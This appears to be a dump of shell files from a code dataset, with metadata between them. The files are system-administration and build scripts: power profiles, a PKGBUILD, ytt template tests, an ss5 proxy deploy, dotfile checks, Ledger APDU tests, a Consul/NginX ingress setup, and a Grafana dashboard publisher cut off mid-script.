PCIE_ASPM_POLICY=default
LAPTOP_MODE=0
DIRTY_RATIO=30
DIRTY_BACKGROUND_RATIO=10
DIRTY_EXPIRE_CENTISECS=300
DIRTY_WRITEBACK_CENTISECS=3000
SCSI_HOST_POLICY=max_performance
REMOUNT_OPTIONS=relatime
BLOCKDEV_READAHEAD=256
HD_POWER_MANAGEMENT=254
HD_SPINDOWN_TIMEOUT=253
SND_INTEL_POWER_SAVE=0
SND_AC97_POWER_SAVE=0
WIRELESS_POWER_SAVE=off
BACKLIGHT_BRIGHTNESS=15
if [[ $MODULES ]]; then
for i in "${MODULES[@]}"; do
modprobe $i &> /dev/null
done
fi
}
# Battery profile: power-saving settings, unload webcam modules.
bat() {
CPUFREQ_GOVERNOR=ondemand
NMI_WATCHDOG=0
BUS_CONTROL=auto
USB_AUTOSUSPEND_TIMEOUT=5
PCIE_ASPM_POLICY=powersave
LAPTOP_MODE=5
DIRTY_RATIO=90
DIRTY_BACKGROUND_RATIO=1
DIRTY_EXPIRE_CENTISECS=600
DIRTY_WRITEBACK_CENTISECS=6000
SCSI_HOST_POLICY=min_power
REMOUNT_OPTIONS=noatime
BLOCKDEV_READAHEAD=4096
HD_POWER_MANAGEMENT=1
HD_SPINDOWN_TIMEOUT=24
SND_INTEL_POWER_SAVE=1
SND_AC97_POWER_SAVE=1
WIRELESS_POWER_SAVE=on
BACKLIGHT_BRIGHTNESS=10
if [[ $MODULES ]]; then
for i in "${MODULES[@]}"; do
modprobe -r $i &> /dev/null
done
fi
}
}
# Apply whatever tunables the selected profile set. Every setting is
# optional: each [[ $VAR ]] guard skips tunables the profile left unset,
# and opt() silently skips sysfs/proc files that don't exist on this box.
_common() {
# opt FILE VALUE — write VALUE into FILE if FILE exists, ignoring errors
opt() { [[ -f $1 ]] && echo $2 > $1 2> /dev/null; }
if [[ $CPUFREQ_GOVERNOR ]]; then
modprobe cpufreq_$CPUFREQ_GOVERNOR &> /dev/null
for i in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
opt $i $CPUFREQ_GOVERNOR
done
fi
if [[ $NMI_WATCHDOG ]]; then
opt /proc/sys/kernel/nmi_watchdog $NMI_WATCHDOG
fi
if [[ $BUS_CONTROL ]]; then
for i in /sys/bus/*/devices/*/power/control; do
opt $i $BUS_CONTROL
done
fi
if [[ $USB_AUTOSUSPEND_TIMEOUT ]]; then
for i in /sys/bus/usb/devices/*/power/autosuspend; do
opt $i $USB_AUTOSUSPEND_TIMEOUT
done
fi
if [[ $PCIE_ASPM_POLICY ]]; then
opt /sys/module/pcie_aspm/parameters/policy $PCIE_ASPM_POLICY
fi
if [[ $LAPTOP_MODE ]]; then
opt /proc/sys/vm/laptop_mode $LAPTOP_MODE
fi
if [[ $DIRTY_RATIO ]]; then
opt /proc/sys/vm/dirty_ratio $DIRTY_RATIO
fi
if [[ $DIRTY_BACKGROUND_RATIO ]]; then
opt /proc/sys/vm/dirty_background_ratio $DIRTY_BACKGROUND_RATIO
fi
if [[ $DIRTY_EXPIRE_CENTISECS ]]; then
opt /proc/sys/vm/dirty_expire_centisecs $DIRTY_EXPIRE_CENTISECS
fi
if [[ $DIRTY_WRITEBACK_CENTISECS ]]; then
opt /proc/sys/vm/dirty_writeback_centisecs $DIRTY_WRITEBACK_CENTISECS
fi
if [[ $SCSI_HOST_POLICY ]]; then
for i in /sys/class/scsi_host/host*/link_power_management_policy; do
opt $i $SCSI_HOST_POLICY
done
fi
if [[ $REMOUNT_OPTIONS ]]; then
# remount every mounted partition matching PARTITIONS (default /dev/sd*)
# with the profile's atime options; the pattern is regex-escaped for awk
local p=${PARTITIONS:-/dev/sd*}
for i in $(awk "/^${p//\//\\/}/ {print \$1}" /etc/mtab); do
mount -o remount,$REMOUNT_OPTIONS $i
done
fi
# whole-disk settings: readahead plus hdparm power management/spindown
for i in ${DEVICES:-/dev/sd?}; do
[[ $BLOCKDEV_READAHEAD ]] && blockdev --setra $BLOCKDEV_READAHEAD $i
[[ $HD_POWER_MANAGEMENT ]] && hdparm -q -B $HD_POWER_MANAGEMENT $i
[[ $HD_SPINDOWN_TIMEOUT ]] && hdparm -q -S $HD_SPINDOWN_TIMEOUT $i
done
if [[ $SND_INTEL_POWER_SAVE ]]; then
local dir=/sys/module/snd_hda_intel/parameters yn
[[ $SND_INTEL_POWER_SAVE -eq 1 ]] && yn=Y || yn=N
opt $dir/power_save_controller $yn
opt $dir/power_save $SND_INTEL_POWER_SAVE
fi
if [[ $SND_AC97_POWER_SAVE ]]; then
local dir=/sys/module/snd_ac97_codec/parameters
opt $dir/power_save $SND_AC97_POWER_SAVE
fi
if [[ $WIRELESS_POWER_SAVE ]]; then
for i in $(iw dev | grep Interface | cut -d ' ' -f 2); do
iw dev $i set power_save $WIRELESS_POWER_SAVE
done
fi
if [[ $BACKLIGHT_BRIGHTNESS ]]; then
for i in /sys/class/backlight/acpi_video*/brightness; do
opt $i $BACKLIGHT_BRIGHTNESS
done
fi
}
# Dispatch: run when the first argument is present and is not an option
# flag. Fix: the original used 'expr match "$1" -', a GNU-only expr
# extension that also forks a process; the builtin pattern test below is
# equivalent (true when $1 does not start with '-').
if [[ -n ${1-} && ${1-} != -* ]]; then
profile=$1
config=/etc/conf.d/ftw
# load the user config when present, else fall back to built-in profiles
[[ -f $config ]] && source $config || _defaults
if declare -f "$profile" > /dev/null; then
if [[ $EUID -ne 0 ]]; then
echo 'requires root privileges'
exit 1
fi
# crude mutual exclusion: refuse to run while another instance is active
lock=/tmp/ftw.lock
[[ -f $lock ]] && exit 2
: > $lock
trap "rm -f $lock" EXIT
# set the profile's variables, then apply them
$profile
_common
# remember the active profile for other tools to read
[[ $PROFILE_FILE ]] && echo $profile > $PROFILE_FILE
else
echo "profile '$profile' does not exist in $config"
exit 1
fi
else
echo 'usage: ftw [profile]'
exit 1
fi
| true
|
6491f949d0db143692f09b4009b6167dbc3bf8e1
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/retropong/PKGBUILD
|
UTF-8
| 1,025
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Jozef Riha <jose1711 at gmail dot com>
# PKGBUILD for retropong, a small SDL pong clone from SourceForge.
pkgname=retropong
pkgver=1.0
pkgrel=2
pkgdesc="a simple pong remake"
arch=('i686' 'x86_64')
license=('GPL2')
url="http://sourceforge.net/projects/retropong/"
source=("http://downloads.sourceforge.net/project/${pkgname}/${pkgname}.tar.gz" "retropong.desktop")
depends=('sdl_mixer' 'sdl_ttf' 'bash')
md5sums=('cf5b70d1960419261530152243ee60d0'
'e065c2ebfa1d76cddc163811d1fb8fba')
build() {
cd $srcdir/$pkgname
# Fix: libraries must come AFTER the source file on the gcc command line.
# With linkers defaulting to --as-needed (Arch binutils), '-lSDL ...'
# listed before retropong.c is dropped and the link fails with
# undefined references.
gcc -o retropong retropong.c -lSDL -lSDL_mixer -lSDL_ttf
}
# Install the game, its font and sounds under /usr/share/retropong, plus a
# generated launcher in /usr/bin that cd's into the data dir first (the
# game loads its assets from the current directory).
package() {
cd $srcdir/$pkgname
install -D -m755 ./retropong $pkgdir/usr/share/retropong/retropong
install -D -m644 ./retrofont.ttf $pkgdir/usr/share/retropong/retrofont.ttf
install -D -m644 ./*wav $pkgdir/usr/share/retropong/
echo -e "#"'!'"/bin/bash\ncd /usr/share/retropong/\n./retropong" >./retropong.sh
install -D -m755 ./retropong.sh $pkgdir/usr/bin/retropong
install -D -m644 $srcdir/retropong.desktop $pkgdir/usr/share/applications/retropong.desktop
}
| true
|
7cebb72c447ac3d5177df394509a6b331f40505f
|
Shell
|
gwang550/load-balancer-operator-for-kubernetes
|
/hack/test-ytt.sh
|
UTF-8
| 1,758
| 3.75
| 4
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Copyright 2020 VMware, Inc.
# SPDX-License-Identifier: Apache-2.0

# Smoke tests for the ytt AKODeploymentConfig templates.
set -o errexit # Exits immediately on unexpected errors (does not bypass traps)
set -o nounset # Errors if variables are used without first being defined
set -o pipefail # Non-zero exit codes in piped commands causes pipeline to fail
# with that code
# Change directories to the parent directory of the one in which this script is
# located.
cd "$(dirname "${BASH_SOURCE[0]}")/.."
export PATH=$PATH:$PWD/hack/tools/bin
export TEMPLATE_DIR="config/ytt/akodeploymentconfig"
# Use ANSI colors only when attached to a real terminal.
if command -v tput &>/dev/null && tty -s; then
RED=$(tput setaf 1)
NORMAL=$(tput sgr0)
else
RED=$(echo -en "\e[31m")
NORMAL=$(echo -en "\e[00m")
fi
# Print a failure marker plus each message argument on its own line to
# stderr, colored red when $RED/$NORMAL were set by the probe above.
log_failure() {
  local fmt="${RED}✖ %s${NORMAL}\n"
  # printf reuses the format once per argument: one line per message
  printf "$fmt" "$@" >&2
}
# Compare two strings for equality. On mismatch, log
# "<expected> == <actual> :: <msg>" when a non-empty message was given,
# and return 1. Returns 0 when they match.
assert_eq() {
  local want="$1" got="$2" note="${3-}"
  [ "$want" == "$got" ] && return 0
  # only log when the caller supplied a non-empty message
  if [ -n "$note" ]; then
    log_failure "$want == $got :: $note" || true
  fi
  return 1
}
# Case 1: the default template must render without error (output is
# discarded; errexit fails the whole script on a non-zero ytt exit).
case1() {
# Test the default AKODeploymentConfig template generation
ytt -f config/ytt/akodeploymentconfig/values.yaml -f config/ytt/akodeploymentconfig/akodeploymentconfig.yaml >/dev/null 2>&1
}
# Case 2: rendering with explicit IP pool bounds must surface them in the
# generated spec; the JSON output is checked with jq.
case2() {
# Test the ip pools section
res="$(ytt -f config/ytt/akodeploymentconfig/values.yaml -f config/ytt/akodeploymentconfig/akodeploymentconfig.yaml -v AVI_DATA_NETWORK_IP_POOL_START=10.0.0.2 -v AVI_DATA_NETWORK_IP_POOL_END=10.0.0.3 -o json 2>&1)"
assert_eq "$(echo "${res}" | jq -cr 'select( .spec).spec.dataNetwork.ipPools[].start')" "10.0.0.2" "failed ipPools"
assert_eq "$(echo "${res}" | jq -cr 'select( .spec).spec.dataNetwork.ipPools[].end')" "10.0.0.3" "failed ipPools"
}
case1
case2
| true
|
36c7ea02860c09d909166520bdca118ef03077b0
|
Shell
|
sgs921107/docker_ss5
|
/deploy/deploy.sh
|
UTF-8
| 1,695
| 3.34375
| 3
|
[] |
no_license
|
#########################################################################
# File Name: deploy.sh
# Author: qiezi
# mail: qiezi@gmail.com
# Created Time: Wed 19 Feb 2020 12:29:13 PM CST
#########################################################################
#!/bin/bash
# Deploy a dockerized ss5 (SOCKS5) proxy: installs docker/docker-compose,
# writes the ss5 config/credentials and .env, starts the stack, and opens
# the service port in firewalld.
# ===================run the script with root user=================================
# ========================== configuration start ==================================
# 1. docker-compose.yml settings
SS5_VERSION=1.0
# ss5 service port exposed on the host
REAL_SS5_PORT=1080
# 2. proxy credentials (original comments said "squid"; these are for ss5)
# username
ss5_username=ss5
# password
ss5_password=online
# optional pip index URL to speed up package installs (empty = default)
# pip_repository=https://pypi.tuna.tsinghua.edu.cn/simple
pip_repository=
# ========================== configuration end ==================================
ss5_dir=..
mkdir -p $ss5_dir/logs
# derived paths
install_docker_script=./install_docker.sh
ss5_conf=$ss5_dir/ss5.conf
ss5_users=$ss5_dir/ss5.passwd
ss5_logs=$ss5_dir/logs
# check/install docker and docker-compose; temporarily patch the installer
# to use the configured pip mirror, then revert the patch via git
if [ -n "$pip_repository" ]
then
sed -i "s#pip install#pip install -i $pip_repository#g" $install_docker_script
fi
sh $install_docker_script
if [ -n "$pip_repository" ]
then
git checkout $install_docker_script
fi
# write credentials file ("user password" format)
echo "$ss5_username $ss5_password" > $ss5_users
# environment file consumed by docker-compose.yml
echo "SS5_VERSION=$SS5_VERSION
REAL_SS5_PORT=$REAL_SS5_PORT
SS5_CONF=$ss5_conf
SS5_USERS=$ss5_users
SS5_LOGS=$ss5_logs
" > .env
# ss5 config: username/password auth, permit all authenticated clients
echo "auth 0.0.0.0/0 - u
permit u 0.0.0.0/0 - 0.0.0.0/0 - - - - -
" > $ss5_conf
# start the service
docker-compose up -d
firewall-cmd --permanent --add-port=$REAL_SS5_PORT/tcp
firewall-cmd --permanent --add-port=$REAL_SS5_PORT/udp
# reload the firewall so the new rules take effect
firewall-cmd --reload
| true
|
f7643c8cfdbf3822033992fcbb714808a766fa62
|
Shell
|
jasmith79/jasmith79-dotfiles
|
/testcheck.sh
|
UTF-8
| 4,150
| 3.375
| 3
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] |
permissive
|
os=$(uname)
# Determine working directory
wd=$(pwd)
# Determine current user
user=$(logname)
who=$(whoami)
# logname fails in some environments (no controlling tty, sudo);
# fall back to $SUDO_USER, then to whoami's answer.
if [[ $user = "" ]]; then
user="$SUDO_USER"
fi
if [[ $user = "" ]]; then
user="$who"
fi
# TODO: replace these with version checks
# The original repeated the same check/echo stanza sixteen times; one loop
# over a table now drives it. Columns: command|installed-name|missing-name.
# Both display names are kept verbatim because their case/wording differs
# per tool, so the output is byte-identical to the original, in the same
# order.
while IFS='|' read -r cmd ok_name missing_name; do
  if command -v "$cmd" >/dev/null; then
    echo "$ok_name successfully installed."
  else
    echo "ERROR: missing $missing_name."
  fi
done <<'EOF'
git|Git|git
gcc|gcc|gcc
make|Make|make
node|Nodejs|nodejs
webpack|Webpack|webpack
yarn|Yarn|yarn
atom|Atom|atom
vagrant|vagrant|vagrant
ansible-playbook|Ansible|ansible
virtualenv|virtualenv|virtualenv
python3|Python3|python3
pip3|pip3|pip3
fish|Fish shell|fish shell
clj|Clojure|Clojure
lein|Leiningen|leiningen
nvim|Neovim|neovim
EOF
# Resolve the dotfile symlink targets. macOS ships BSD readlink without
# -f, so prefer GNU coreutils' greadlink when it is installed.
if command -v greadlink > /dev/null; then
bashlnk="$(greadlink -f ~/.bashrc)"
vimlnk="$(greadlink -f ~/.vimrc)"
nvimlnk="$(greadlink -f ~/.config/nvim/init.vim)"
fishlnk="$(greadlink -f ~/.config/fish/config.fish)"
keylnk="$(greadlink -f ~/.config/fish/functions/fish_user_key_bindings.fish)"
else
bashlnk="$(readlink -f ~/.bashrc)"
vimlnk="$(readlink -f ~/.vimrc)"
nvimlnk="$(readlink -f ~/.config/nvim/init.vim)"
fishlnk="$(readlink -f ~/.config/fish/config.fish)"
keylnk="$(readlink -f ~/.config/fish/functions/fish_user_key_bindings.fish)"
fi
# Each dotfile symlink must resolve back into this repo's working copy.
if [[ "$bashlnk" = "$wd/bashrc" ]]; then
echo "~/.bashrc successfully copied"
else
echo "ERROR: missing bashrc"
fi
if [[ "$vimlnk" = "$wd/vim/vimrc" ]]; then
echo "~/.vimrc successfully copied"
else
echo "ERROR: missing vimrc"
fi
if [[ "$fishlnk" = "$wd/fish/config.fish" ]]; then
echo "~/.config/fish/config.fish successfully copied"
else
echo "ERROR: missing config.fish"
fi
if [[ "$keylnk" = "$wd/fish/fish_user_key_bindings.fish" ]]; then
echo "fish key bindings successfully installed"
else
echo "ERROR: missing fish key bindings"
fi
if [[ "$nvimlnk" = "$wd/nvim/init.vim" ]]; then
echo "~/.config/nvim/init.vim successfully copied"
else
echo "ERROR: missing init.vim"
fi
# terminology is Linux-only; on macOS just remind about login-shell quirks.
if [[ $os = "Darwin" ]]; then
echo "OS X runs all shells as login, be sure to add an appropriate source command to .bash_profile"
echo "See my .bashrc for details."
else
if command -v greadlink > /dev/null; then
termlnk="$(greadlink -f ~/.config/terminology/config/standard/base.cfg)"
else
termlnk="$(readlink -f ~/.config/terminology/config/standard/base.cfg)"
fi
if command -v terminology >/dev/null; then
echo "Terminology successfully installed."
else
echo "ERROR: missing terminology."
fi
if [[ "$termlnk" = "$wd/terminology/terminology.cfg" ]]; then
echo "~/.config/terminology/config/standard/base.cfg successfully copied"
else
echo "ERROR: missing terminology base.cfg"
fi
fi
| true
|
9ebb6c0e8801df3998e214921627faec02e9492b
|
Shell
|
bakingbacon/app-tezos
|
/test/apdu-tests/baking/baking_test.sh
|
UTF-8
| 2,822
| 2.859375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# APDU-level baking tests for the Tezos Ledger app; drives ../apdu.sh.
set -Eeuo pipefail
# Resolve the directory containing this script so the relative helper
# (../apdu.sh) works regardless of the caller's cwd.
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd "$DIR"
# Print the given message followed by a blank line, then abort the script.
fail() {
  printf '%s\n\n' "$1"
  exit 1
}
# Each brace group below is one interactive scenario: the operator is told
# what to accept on the device, then raw hex APDUs are piped to ../apdu.sh.
# Scenarios expected to be rejected by the app invert the exit status and
# call fail() if the command unexpectedly succeeds.
{
echo; echo "Authorize baking"
echo "ACCEPT"
{
echo 8001000011048000002c800006c18000000080000000 # Authorize baking
} | ../apdu.sh
}
{
echo; echo "Baking a block with multiple packets should fail"
echo "ACCEPT Reset HWM"
{
echo 800681000400000000 # Reset HWM
} | ../apdu.sh
echo; echo "Self-delegation and block header: EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401005703cae1b71a3355e4476620d68d40356c5a4e5773d28357fea2833f24cd99c767260a0000aed011841ffbb0bcc3b51c80f2b6c333a1be3df0ec09f9ef01f44e9502ff00aed011841ffbb0bcc3b51c80f2b6c333a1be3df0
echo 800481000a017a06a7700000000102 # Bake block at level 1
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
echo; echo "Prefix 00 byte: EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401000100 # Prefix packet starting with 00
echo 800481000a017a06a7700000000102 # Bake block at level 1
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
echo; echo "Prefix 03: EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401000103 # Prefix packet starting with 03
echo 800481000a017a06a7700000000102 # Bake block at level 1
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
echo; echo "Postfix 00... EXPECTING FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800401000a017a06a7700000000102 # Bake block at level 1
echo 800481000100 # Postfix packet starting with 00
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
}
{
echo; echo "Endorsing a previous level should fail"
echo ACCEPT Reset HWM
{
echo 800681000400000000 # Reset HWM
echo 8004000011048000002c800006c18000000080000000
echo 800481000a017a06a7700000000102 # Bake block at level 1
echo 8004000011048000002c800006c18000000080000000
echo 800481002a027a06a77000000000000000000000000000000000000000000000000000000000000000000000000001 # Endorse at level 1
echo 8004000011048000002c800006c18000000080000000
echo 800481002a027a06a77000000000000000000000000000000000000000000000000000000000000000000000000002 # Endorse at level 2
} | ../apdu.sh
echo "EXPECT FAILURE"; sleep 2;
({
echo 8004000011048000002c800006c18000000080000000
echo 800481002a027a06a77000000000000000000000000000000000000000000000000000000000000000000000000001 # Endorse at level 1 (should fail)
} | ../apdu.sh && fail ">>> EXPECTED FAILURE") || true
}
| true
|
63063d6f16b5116b626a710d8d5624896459a4c3
|
Shell
|
davidjfelix-legacy/provisioner
|
/modules/bazel/linux-amd64-ubuntu-zesty
|
UTF-8
| 529
| 2.59375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Install Bazel on Ubuntu Zesty (amd64) from the official apt repository.
# Bash strict mode
set -euvo pipefail
# Install deps
sudo apt-get -y install \
apt-transport-https \
ca-certificates \
curl \
software-properties-common
# Get the bazel gpg key and trust it
# NOTE(review): apt-key is deprecated on newer Ubuntu releases; acceptable
# here since this module explicitly targets zesty.
curl https://bazel.build/bazel-release.pub.gpg | sudo apt-key add -
# Add bazel repo
sudo add-apt-repository -y "deb [arch=amd64] http://storage.googleapis.com/bazel-apt stable jdk1.8"
# Install bazel
sudo apt-get -y update
sudo apt-get -y install bazel
# TODO: add zsh and bash completion to this step
| true
|
c8f73b1d73e49745fdffe316a62f6bbfab7251f5
|
Shell
|
kecorbin/consul-hcs-vm-demo
|
/assets/terraform/ingress/templates/nginx-ingress.sh
|
UTF-8
| 5,963
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
# Terraform template: provisions an Ubuntu VM as a Consul ingress gateway
# fronted by NginX. ${vault_server} and ${consul_datacenter} are Terraform
# template variables; $${...} escapes render as literal shell ${...}.
#Utils
apt-get update -y
apt-get upgrade -y
apt-get install -y unzip jq nginx
# Fix for Nginx PID problem in Ubuntu 16.04 in an EC2 instance
systemctl stop nginx
mkdir /etc/systemd/system/nginx.service.d
printf "[Service]\nExecStartPost=/bin/sleep 0.1\n" > /etc/systemd/system/nginx.service.d/override.conf
systemctl daemon-reload
systemctl start nginx
service_id=$(hostname)
hostname=$(hostname)
#get the jwt from azure msi
jwt="$(curl -s 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true | jq -r '.access_token')"
#log into vault
token=$(curl -s \
--request POST \
--data '{"role": "ingress", "jwt": "'$jwt'"}' \
http://${vault_server}:8200/v1/auth/azure/login | jq -r '.auth.client_token')
#get the consul secret
consul_secret=$(curl -s \
--header "X-Vault-Token: $token" \
http://${vault_server}:8200/v1/secret/data/consul/shared | jq '.data.data')
#extract the bootstrap info
gossip_key=$(echo $consul_secret | jq -r .gossip_key)
retry_join=$(echo $consul_secret | jq -r .retry_join)
ca=$(echo $consul_secret | jq -r .ca)
#debug
echo $gossip_key
echo $retry_join
echo "$ca"
# Install Consul
cd /tmp
wget https://releases.hashicorp.com/consul/1.8.0+ent/consul_1.8.0+ent_linux_amd64.zip -O consul.zip
unzip ./consul.zip
mv ./consul /usr/bin/consul
mkdir -p /etc/consul/config
# NOTE(review): the quotes around "$ca" inside this heredoc are written
# literally into ca.pem — confirm the consumer tolerates them, otherwise
# the PEM is likely invalid.
cat <<EOF > /etc/consul/ca.pem
"$ca"
EOF
# Generate the consul startup script. The outer heredoc is unquoted, so
# $retry_join / ${consul_datacenter} expand now, at template-write time,
# while \$(...) survives to run when the generated script executes.
#!/bin/sh -e
cat <<EOF > /etc/consul/consul_start.sh
#!/bin/bash -e
# Get JWT token from the metadata service and write it to a file
curl 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https%3A%2F%2Fmanagement.azure.com%2F' -H Metadata:true -s | jq -r .access_token > ./meta.token
# Use the token to log into the Consul server, we need a valid ACL token to join the cluster and setup autoencrypt
CONSUL_HTTP_ADDR=https://$retry_join consul login -method azure -bearer-token-file ./meta.token -token-sink-file /etc/consul/consul.token
# Generate the Consul Config which includes the token so Consul can join the cluster
cat <<EOC > /etc/consul/config/consul.json
{
"acl":{
"enabled":true,
"down_policy":"async-cache",
"default_policy":"deny",
"tokens": {
"default":"\$(cat /etc/consul/consul.token)"
}
},
"ca_file":"/etc/consul/ca.pem",
"verify_outgoing":true,
"datacenter":"${consul_datacenter}",
"encrypt":"$gossip_key",
"server":false,
"log_level":"INFO",
"ui":true,
"retry_join":[
"$retry_join"
],
"ports": {
"grpc": 8502
},
"auto_encrypt":{
"tls":true
}
}
EOC
# Run Consul
/usr/bin/consul agent -node=$(hostname) -config-dir=/etc/consul/config/ -data-dir=/etc/consul/data
EOF
chmod +x /etc/consul/consul_start.sh
# Setup Consul agent in SystemD
cat <<EOF > /etc/systemd/system/consul.service
[Unit]
Description=Consul Agent
After=network-online.target
[Service]
WorkingDirectory=/etc/consul
ExecStart=/etc/consul/consul_start.sh
Restart=always
[Install]
WantedBy=multi-user.target
EOF
# Install Consul-template
CONSUL_TEMPLATE_VERSION="0.25.1"
curl --silent --remote-name https://releases.hashicorp.com/consul-template/$${CONSUL_TEMPLATE_VERSION}/consul-template_$${CONSUL_TEMPLATE_VERSION}_linux_amd64.zip
unzip consul-template_$${CONSUL_TEMPLATE_VERSION}_linux_amd64.zip
mv consul-template /usr/local/bin/
# Fix: the original line was 'rm unzip <zipfile>', which also tried to
# delete a file literally named "unzip" (stray word left from editing).
rm consul-template_$${CONSUL_TEMPLATE_VERSION}_linux_amd64.zip
# NOTE(review): with 'sudo cat << EOF > file' the redirection runs as the
# invoking user, not via sudo; it works here only because the whole script
# already runs as root.
sudo cat << EOF > /etc/systemd/system/consul-template.service
[Unit]
Description="Template rendering, notifier, and supervisor for @hashicorp Consul and Vault data."
Requires=network-online.target
After=network-online.target
[Service]
User=root
Group=root
ExecStart=/usr/local/bin/consul-template -config=/etc/consul-template/consul-template-config.hcl
ExecReload=/usr/local/bin/consul reload
KillMode=process
Restart=always
LimitNOFILE=65536
[Install]
WantedBy=multi-user.target
EOF
mkdir --parents /etc/consul-template
mkdir --parents /etc/ssl
touch /etc/consul-template/consul-template-config.hcl
# Register this host as the "ingress-gateway" service with a TCP health
# check on the NginX listener port.
cat << SERVICES > /etc/consul/config/services.hcl
services = [
{
id = "$(hostname)"
name = "ingress-gateway"
port = 8080
checks = [
{
id = "HTTP-TCP"
interval = "10s"
tcp = "localhost:8080"
timeout = "1s"
}
]
}
]
SERVICES
# Generate consul connect certs for ingress-gateway service
# (the {{...}} below is consul-template syntax, rendered at runtime)
cat << EOF > /etc/ssl/ca.crt.tmpl
{{range caRoots}}{{.RootCertPEM}}{{end}}
EOF
cat << EOF > /etc/ssl/cert.pem.tmpl
{{with caLeaf "ingress-gateway"}}{{.CertPEM}}{{end}}
EOF
cat << EOF > /etc/ssl/cert.key.tmpl
{{with caLeaf "ingress-gateway"}}{{.PrivateKeyPEM}}{{end}}
EOF
# create consul template for nginx config
cat << EOF > /etc/nginx/conf.d/load-balancer.conf.ctmpl
upstream web {
{{range connect "web"}}
server {{.Address}}:{{.Port}};
{{end}}
}
server {
listen 8080;
server_name localhost;
location / {
proxy_pass https://web;
proxy_http_version 1.1;
# these refer to files written by templates above
proxy_ssl_certificate /etc/ssl/cert.pem;
proxy_ssl_certificate_key /etc/ssl/cert.key;
proxy_ssl_trusted_certificate /etc/ssl/ca.crt;
}
}
EOF
# create consul-template Config
cat << EOF > /etc/consul-template/consul-template-config.hcl
template {
source = "/etc/nginx/conf.d/load-balancer.conf.ctmpl"
destination = "/etc/nginx/conf.d/default.conf"
command = "service nginx reload"
}
template {
source = "/etc/ssl/ca.crt.tmpl"
destination = "/etc/ssl/ca.crt"
}
template {
source = "/etc/ssl/cert.pem.tmpl"
destination = "/etc/ssl/cert.pem"
}
template {
source = "/etc/ssl/cert.key.tmpl"
destination = "/etc/ssl/cert.key"
}
EOF
# Restart SystemD
systemctl daemon-reload
systemctl enable consul
systemctl enable consul-template
systemctl restart consul
systemctl restart consul-template
service nginx restart
| true
|
bd8446c9920d98961ee12cf45e5bc4fc3dd97055
|
Shell
|
kittyhawk/scripts
|
/test
|
UTF-8
| 823
| 3.640625
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer"
] |
no_license
|
#!/bin/bash
# Scaling smoke test: for each node count in the list, allocate that many
# nodes with khget, boot them, and verify that every node answers a ping.
# Usage: test [list-of-node-counts]   (defaults to powers of two up to 512)
#set -x
# Seconds to wait between booting the nodes and pinging them.
s=10
list="$1"
if [[ -z $list ]]
then
list="1 2 4 8 16 32 64 128 256 512"
fi
for i in $list
do
echo "$i: allocating ...."
khalloc="$(khget -x user${i} $i)"
# Count how many nodes the allocation actually returned (one %ip% per node).
ncount=$(echo "$khalloc" | khdo peripcmd "echo %ip%" | wc -l)
if (( $ncount != $i ))
then
echo "ERROR: $i: did not get the number of nodes expected $ncount != $i"
echo $khalloc
break
fi
echo "$i: booting...."
echo "$khalloc" | khdo write 'setenv eth1 "$p0ip $p0mask" && run kboot'
echo "sleeping for $s"
sleep $s
echo "$i: pinging..."
# One ping attempt per node; count the successes.
pcount=$(echo "$khalloc" | khdo peripcmd "if ping -c 1 %ip% >/dev/null 2>&1;then echo good; else echo bad;fi" | grep good | wc -l)
if (( $pcount != $i ))
then
echo "ERROR: $i: was not able to ping all nodes $pcount != $i"
echo $khalloc
break
fi
done
| true
|
2f23a57baa6e886ea9a307d2c11cd380288b714d
|
Shell
|
jharibabu/Test_monitoring
|
/github-actions/publish-dashboards/run.sh
|
UTF-8
| 1,729
| 3.765625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# Render every dashboards/<folder>/<name>.jsonnet with grafonnet and publish
# the result to Grafana via its HTTP API, creating folders as needed.
# Usage: run.sh <grafana-base-url>   (requires $TOKEN holding an API token)
set -euo pipefail

GRAFANA="${1}"

# Print the Grafana folder id for the given title, creating the folder first
# if it does not exist yet.
function get_folder_id() {
  fname="\"${1}\""
  existing=$(curl -sf -X GET \
    -H "Authorization: Bearer ${TOKEN}" \
    -H 'Content-type: application/json' \
    -H 'Accept: application/json' \
    "${GRAFANA}/api/folders" | \
    jq ".[] | select(.title == ${fname}) | .id")
  if [[ -n "${existing}" ]]; then
    echo "${existing}"
    return 0
  fi
  new=$(curl -sf -X POST \
    -H "Authorization: Bearer ${TOKEN}" \
    -H 'Content-type: application/json' \
    -H 'Accept: application/json' \
    "${GRAFANA}/api/folders" \
    --data-binary "{ \"title\": ${fname} }" | \
    jq '.id')
  echo "${new}"
  return 0
}

# globstar: make '**' actually recurse (without it bash treats '**' as '*',
# so only one directory level was ever scanned).  nullglob: when no .jsonnet
# files exist the loop is skipped instead of iterating the literal pattern.
shopt -s globstar nullglob

bad=0
for f in dashboards/**/*.jsonnet ; do
  folder=$(dirname "$f" | sed 's/^dashboards\///')
  folder_id=$(get_folder_id "${folder}")
  dbname=$(basename "$f" | sed 's/\.jsonnet$//')
  echo "Updating dashboard ${folder}/${dbname}"
  # Build {dashboard, folderId, overwrite} payload; count build failures but
  # keep going so one broken dashboard does not block the rest.
  if ! jsonnet -J /grafonnet-lib -J . "${f}" | \
